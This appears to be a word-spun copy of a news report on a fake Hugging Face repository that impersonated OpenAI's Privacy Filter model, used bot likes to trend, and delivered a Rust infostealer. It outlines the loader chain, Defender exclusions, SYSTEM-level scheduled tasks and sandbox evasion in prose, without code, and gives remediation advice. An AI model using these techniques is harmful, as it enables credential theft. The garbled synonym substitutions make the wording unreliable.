Briefly
- A malicious Hugging Face repository impersonating OpenAI’s Privateness Filter mannequin reached #1 trending on the platform.
- The malware registered roughly 244,000 downloads and 667 likes in beneath 18 hours earlier than being eliminated.
- The repository delivered a six-stage infostealer that harvested browser passwords, Discord tokens, crypto pockets keys, and SSH credentials from Home windows machines—then silently despatched every thing to attacker-controlled servers.
OpenAI launched Privateness Filter in late April—a small, open-weight mannequin constructed to detect and mechanically redact personally identifiable info from textual content. It landed on Hugging Face beneath an Apache 2.0 license and shortly attracted developer curiosity. Somebody observed.
Inside days, a faux account named “Open-OSS” printed a near-identical repository referred to as privacy-filter. The mannequin card was copied phrase for phrase from OpenAI’s. The one distinction within the “readme” file: directions to clone the repo and run a file referred to as begin.bat on Home windows, or loader.py on Linux and Mac.
Inside 18 hours, the faux repo hit #1 on Hugging Face’s trending web page—racking up roughly 244,000 downloads and 667 likes. HiddenLayer, the AI safety agency that flagged the marketing campaign, discovered that 657 of these 667 likes got here from accounts matching predictable auto-generated bot-naming patterns.
The obtain numbers had been nearly definitely inflated the identical means. Manufactured social proof to make the bait look actual.
How the malware really labored
The malware principally labored like a poisoned tablet wrapped in a really convincing sweet coating. The loader.py script opens with faux mannequin coaching output—progress bars, artificial datasets, dummy class names—designed to seem like an actual AI loader is operating.
Underneath the hood, it quietly disables safety checks, pulls an encoded command from a public JSON paste web site (a wise trick: no have to replace the repository when the payload adjustments), and passes that command to PowerShell operating utterly hidden within the background. Home windows customers see nothing.
That command downloads a second script from a site mimicking a blockchain analytics API. That script downloads the precise malware—a custom-built infostealer written in Rust—provides it to Home windows Defender’s exclusions listing, then launches it at SYSTEM-level privileges through a scheduled activity that instantly deletes itself after firing. The entire chain runs and cleans up after itself, leaving nearly no hint.
The ultimate payload is thorough. It grabs every thing saved in Chrome and Firefox—saved passwords, session cookies, browser historical past, encryption keys, every thing. It targets Discord accounts, cryptocurrency pockets seed phrases, SSH keys, FTP credentials, and takes screenshots throughout all screens. Then it packages every thing as a compressed JSON bundle and ships it to attacker-controlled servers.
There’s no want for us to let you know what the hackers can do with all that info later.
The malware additionally checks whether or not it is operating in a digital machine or a safety sandbox, and quits quietly if it detects one. It is designed to run as soon as on actual targets, steal every thing, and disappear.
Why that is greater than only one repo
This is not an remoted incident. It is a part of a sample. HiddenLayer recognized six extra repositories beneath a separate Hugging Face account named “anthfu,” uploaded in late April, utilizing the very same malicious loader pointing to the very same command server. These repos impersonated fashions like Qwen3, DeepSeek, and Bonsai to lure AI builders.
The infrastructure itself—a site referred to as api.eth-fastscan.org—was additionally noticed internet hosting a separate malware pattern that beacons to a command server. HiddenLayer believes the connection between the 2 campaigns is “probably linked” and cautions that shared infrastructure alone does not affirm a single operator.
That is what a provide chain assault in opposition to the AI developer neighborhood seems to be like. The attacker does not break into OpenAI or Hugging Face. They only publish a convincing lookalike, sport the trending algorithm with bots, and watch for builders to do the remainder. An identical playbook hit the Lottie Participant JavaScript library in 2024, costing one consumer 10 Bitcoin (price over $700,000 on the time).
What if you happen to downloaded it?
In case you cloned Open-OSS/privacy-filter on a Home windows machine and ran any file from it, you need to deal with the system as absolutely compromised. Do not log into something from that machine earlier than wiping it.
After that, change all of the credentials that had been saved in your browser—passwords, session cookies, OAuth tokens. Transfer any crypto funds to a brand new pockets generated on a clear system ASAP and assume seed phrases had been stolen.
Because it additionally will get your Discord info, and that service is closely automated, you need to invalidate your Discord periods and reset that password. Any SSH keys or FTP credentials on that machine must be thought of burned.
The repository is now eliminated. Huggingface has not disclosed what, if any, extra screening measures it plans to implement for trending repositories.
As of now, seven confirmed malicious repositories from this marketing campaign have been recognized. What number of extra exist—or existed earlier than being detected—stays unknown.
Every day Debrief E-newsletter
Begin day-after-day with the highest information tales proper now, plus unique options, a podcast, movies and extra.